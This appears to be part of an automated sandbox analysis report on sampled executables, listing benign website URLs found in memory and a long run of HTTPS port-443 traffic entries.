Source: 28d9ab8742.exe, 0000001A.00000003.2864836158.0000000005785000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2997888798.0000000005EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://www.mozilla.org#
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: EBFHJEGDAFHIJKECFBKJJKJJDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.office.com
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875512562.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3007244384.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3009195039.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.tiktok.com/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://www.youtube.com
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000002.3026569663.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2973952651.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com3
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://y.music.163.com/m/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61397 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50212
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
